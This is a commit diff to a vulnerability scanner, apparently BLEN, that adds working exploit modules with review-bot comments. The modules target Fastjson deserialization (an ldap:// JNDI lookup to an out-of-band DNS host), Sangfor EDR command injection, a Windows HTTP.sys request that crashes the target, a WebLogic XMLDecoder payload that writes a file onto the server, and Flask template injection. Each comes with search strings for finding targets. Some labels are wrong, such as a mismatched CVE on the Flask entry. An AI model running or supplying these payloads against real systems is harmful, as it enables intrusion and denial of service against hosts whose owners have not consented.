openx-org
2022-03-25 18:08:13 +08:00
parent a288ccaee8
commit 53a7640bd8
6 changed files with 418 additions and 1 deletions


@@ -3,7 +3,7 @@
[![Python 3.x](https://img.shields.io/badge/python-3.x-yellow.svg)](https://www.python.org/)
[![License](https://img.shields.io/badge/license-GPLv3-brown.svg)](https://github.com/openx-org/BLEN/blob/main/LICENSE)
[![POC_NUM](https://img.shields.io/badge/poc_num-157-orange.svg)](#PocSupport)
[![POC_NUM](https://img.shields.io/badge/poc_num-162-orange.svg)](#PocSupport)
![GitHub Repo stars](https://img.shields.io/github/stars/openx-org/BLEN?color=gree)
![GitHub forks](https://img.shields.io/github/forks/openx-org/BLEN?color=blue)
@@ -179,6 +179,9 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|Apache Solr|Apache Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)|``poc/Apache_Solr/CVE_2019_17558/poc.py``|
||Apache Solr 任意文件读取漏洞|``poc/Apache_Solr/File_Read/poc.py``|
||Apache Solr 远程命令执行 Log4j|``poc/Apache_Solr/RCE_Log4j_CVE_2021_44228/poc.py``|
|Alibaba_FastJson|Alibaba_FastJsonRCE_CVE_2017_18349|``poc/Alibaba_FastJsonRCE_CVE_2017_18349/poc.py``|
|MicroSoft|MicroSoftRCE_CVE_2022_2190|``poc\MicroSoftRCE_CVE_2022_21907\poc.py``|
|Sangfor 深信服|深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)|``poc/SANGFOR_深信服/RCE_2020_EDR/poc.py``|
|碧海威 L7|碧海威 L7 弱口令漏洞|``poc/Bithighway_碧海威/Weak_Pass_L7/poc.py``|
|BSPHP|BSPHP 未授权访问 信息泄露漏洞|``poc/BSPHP/Info_Disclosure/poc.py``|
|C-Lodop|C-Lodop 云打印机系统平台任意文件读取漏洞|``poc/C_Lodop/File_Read/poc.py``|
@@ -317,6 +320,8 @@ token = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
||RCE_CVE-2018-3191|``poc/Weblogic/RCE_CVE_2018_3191/poc.py``|
||Weblogic SSRF (CVE-2014-4210)|``poc/Weblogic/SSRF_CVE_2014_4210/poc.py``|
||Weblogic 管理控制台未授权远程命令执行漏洞CVE-2020-14882CVE-2020-14883|``poc/Weblogic/UnAuth_RCE_CVE_2020_14882/poc.py``|
||Weblogic XMLDecoder反序列化漏洞CVE-2017-3506|``poc/Weblogic/XMLDecoder_CVE_2017_3506/poc.py``|
|Flask_Ssti|Flask_Ssti_CVE-2017-12636|``poc\Flask_Ssti_CVE-2017-12636\poc.py``|
|用友NC|用友NC6.5 BeanShell RCE|``poc/Yonyou_用友NC/RCE_BeanShell_CNVD_2021_30167/poc.py``|
||用友ERP-NC 目录遍历漏洞|``poc/Yonyou_用友NC/Dir_List_ERP/poc.py``|
||用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923|``poc/Yonyou_用友NC/Sqli_CNNVD_201610_923/poc.py``|


@@ -0,0 +1,87 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua,get_ceye_dns,verify_ceye_dns
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
组件类的漏洞并不适合直接拿到BLEN里批量扫失败是可以预见的事情笔者建议的是在渗透过程中将可疑的url拿来测试
""", # POC描述写更新描述没有就不写
"name" : "Fastjson 反序列化远程代码执行漏洞CVE-2017-18349", # 漏洞名称
"VulnID" : "CVE-2017-18349", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Fastjson", # 漏洞应用名称
"AppVersion" : "Fastjson <= 1.2.24", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
Fastjson中的parseObject允许远程攻击者通过精心制作的JSON请求执行任意代码
""", # 漏洞简要描述
"fofa-dork":"""
app="Fastjson"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
success,dns_flag = get_ceye_dns()
if success == False:
return [False,dns_flag]
data = '''
{
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://%s/",
"autoCommit": true
}
}
''' % (dns_flag)
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/json",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.post(url,data=data,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
flager = verify_ceye_dns(dns_flag)
if flager == True:
vuln = [True,dns_flag]
elif flager == False:
vuln = [False,dns_flag]
else:
vuln = [False,flager]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()
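Review bot: The `_verify` docstring promises `[True,html_source]`, but both outcome branches store the DNS token (`vuln = [True,dns_flag]` / `vuln = [False,dns_flag]`), so `self._honeypot_check(vuln[1])` is handed a DNS label rather than page source and presumably can never match anything; either pass the response body to the honeypot check or drop it, and rewrite the docstring to say the second element is the DNS token. The `except Exception as e: raise e` around the request only adds a traceback frame and should be a bare `raise` or removed entirely, and `if success == False:` reads better as `if not success:`. `url_handle` is imported but never used in this file. The triple-quoted string inside the `try` body is an expression statement, not a comment, and should be a `#` comment.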


@@ -0,0 +1,59 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
# ...
import urllib3
urllib3.disable_warnings()
_info = {
"author" : "", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
该POC不具备使用价值请忽略
""", # POC描述写更新描述没有就不写
"name" : "Flask 模板注入", # 漏洞名称
"AppName" : "Flask", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
""", # 漏洞简要描述
"fofa-dork":"", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
"timeout" : 10, # 超时设定
}
def verify(host,proxy):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = url_handle(host) + "/?name={{233*233}}" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 and "54289" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
return vuln
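Review bot: `self.timeout` on the `requests.get(...)` line is an undefined name inside the module-level `verify(host,proxy)` function, so every call raises `NameError` before a request is sent; the value is already declared in the metadata, e.g. `timeout = _info["timeout"]`. This file also keeps the older function-style layout while every other POC in this commit subclasses `POCBase`, so it presumably will not be discovered or invoked the same way by the framework; converting it to the class layout would resolve both problems. The `PocDesc` itself says the POC has no practical value and should be ignored, so if it is kept at all it should at least import cleanly and not crash on first use.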


@@ -0,0 +1,109 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
import time
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "hansi", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
本POC只可实现蓝屏
""", # POC描述写更新描述没有就不写
"name" : "Windows HTTP协议栈远程代码执行漏洞(CVE-2022-21907)", # 漏洞名称
"VulnID" : "CVE-2022-21907", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : """
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 11 for ARM64-based Systems
Windows 11 for x64-based Systems
Windows Server, version 20H2 (Server Core Installation)
Windows 10 Version 20H2 for ARM64-based Systems
Windows 10 Version 20H2 for 32-bit Systems
Windows 10 Version 20H2 for x64-based Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows 10 Version 21H1 for 32-bit Systems
Windows 10 Version 21H1 for ARM64-based Systems
Windows 10 Version 21H1 for x64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 1809 for ARM64-based Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
""", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
Microsoft Windows HTTP 协议栈HTTP.sys存在远程代码执行漏洞未经身份认证的远程攻击者可通过向目标 Web 服务器发送特制的HTTP请求来利用此漏洞
从而在目标系统上执行任意代码。利用此漏洞不需要身份认证和用户交互,微软官方将其标记为蠕虫漏洞,微软建议优先修补受此漏洞影响的服务器。
此漏洞影响启用了HTTP Trailer Support的系统默认情况下Windows Server 2019 和 Windows 10 版本 1809不易受到攻击。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if req.status_code == 200 :
poc_headers = {
'Accept-Encoding': 'AAAAAAAAAAAAAAAAAAAAAAAA, '
'BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S, '
'RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF, '
'TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP, '
'OOOAOAOOOAOOAOOOAOOOAOOOAOO, '
'****************************stupiD, *, ,'
}
try:
req = requests.get(url,headers = poc_headers , proxies = self.proxy ,timeout = 5,verify = False)
except requests.exceptions.ReadTimeout as e:
try:
time.sleep(10)
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
except requests.exceptions.ConnectionError as e:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()
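Review bot: `_verify` is destructive here — the `PocDesc` states the POC can only produce a blue screen, and the logic around `poc_headers` treats a later `ConnectionError` as the positive signal — so a batch run of this scanner crashes every affected host instead of merely detecting the issue, while the docstring still claims an ordinary `[True,html_source]` result and `_attack` just delegates to `_verify`, giving callers no non-destructive path. The docstring and `PocDesc` should say explicitly that running this check takes the target down, e.g. `# WARNING: this check crashes the target host; not a passive probe`. The evidence is also weak: any `ConnectionError` after the 10 s sleep (a firewall reset, a proxy failure, an unrelated reboot) is reported as vulnerable. Note the trailing `else:` binds to the inner `try`, so when the first `poc_headers` request returns normally `vuln` stays `[False,""]` and the honeypot check runs on an empty string; a comment on that branch would help the next reader.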


@@ -0,0 +1,72 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
import re
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : " ", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "深信服EDR终端检测响应平台RCE漏洞(CNVD-2020-46552)", # 漏洞名称
"VulnID" : "CNVD-2020-46552", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
终端检测响应平台EDR是深信服公司提供的一套终端安全解决方案方案由轻量级的端点安全软件Agent和管理平台MGR共同组成。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/tool/log/c.php?strip_slashes=system&host=id" # url自己按需调整
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
result = re.search("uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip())
if result:#req.status_code == 200 and :
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()
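Review bot: The pattern passed to `re.search` is a non-raw string literal, so `\d` and `\(` are invalid escape sequences — a `DeprecationWarning` today and a `SyntaxWarning` from Python 3.12 — and it should be a raw literal: `result = re.search(r"uid=\d+\(.+\) gid=\d+\(.+\) groups=\d+\(.+\)",req.text.strip())`. The leftover `#req.status_code == 200 and :` fragment on the `if result:` line and the `except Exception as e: raise e` wrapper are dead code and should go. `url_handle` is imported but unused, and `"author" : " "` is a single space where the other new files use an empty string.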


@@ -0,0 +1,85 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua,random_str
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2021-06-09", # POC创建时间
"UpdateDate" : "2021-06-09", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "Weblogic XMLDecoder反序列化漏洞CVE-2017-3506", # 漏洞名称
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "", # 漏洞应用名称
"AppVersion" : """
Oracle WebLogic Server10.3.6.0.0
Oracle WebLogic Server12.1.3.0.0
Oracle WebLogic Server12.2.1.1.0
Oracle WebLogic Server12.2.1.2.0
""", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
2017年4月17日国家信息安全漏洞共享平台CNVD公开了Weblogic反序列化远程代码执行漏洞CNVD-C-2019-48814
由于在反序列化处理输入信息的过程中存在缺陷,
未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。
""", # 漏洞简要描述
"fofa-dork":"""
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url0 = self.target + "/wls-wsat/CoordinatorPortType" # url自己按需调整
str_flag = random_str()
filename_flag = random_str() + ".log"
data0 = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/' \
'"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java vers' \
'ion="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminSer' \
'ver/tmp/_WL_internal/wls-wsat/54p17w/war/{REWEBSHELL}</string><void method="println"><string>{StrFlag}</string></' \
'void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></' \
'soapenv:Envelope>'.format(REWEBSHELL=filename_flag,StrFlag = str_flag)
headers = {"User-Agent":get_random_ua(),
"Connection":"close",
"Content-Type": "text/xml",
}
url1 = self.target + "/wls-wsat/" + filename_flag
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req0 = requests.post(url0,data=data0,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
req1 = requests.get(url1,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if str_flag in req1.text:#req.status_code == 200 and :
vuln = [True,req1.text]
else:
vuln = [False,req1.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()
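Review bot: `"VulnID" : "oFx-2021-0001"` contradicts this entry's own `name` (CVE-2017-3506) and the field's comment that a CVE takes priority when one exists; it should read `"VulnID" : "CVE-2017-3506",`. `_verify` also has a side effect the docstring never mentions: the first request writes a randomly named `.log` file (`filename_flag`) into the deployed web application on the target and nothing removes it, so each scan leaves an artifact behind; the docstring or `PocDesc` should state this and whether cleanup is expected. `req0` is bound but never inspected, and `url_handle` is imported but unused.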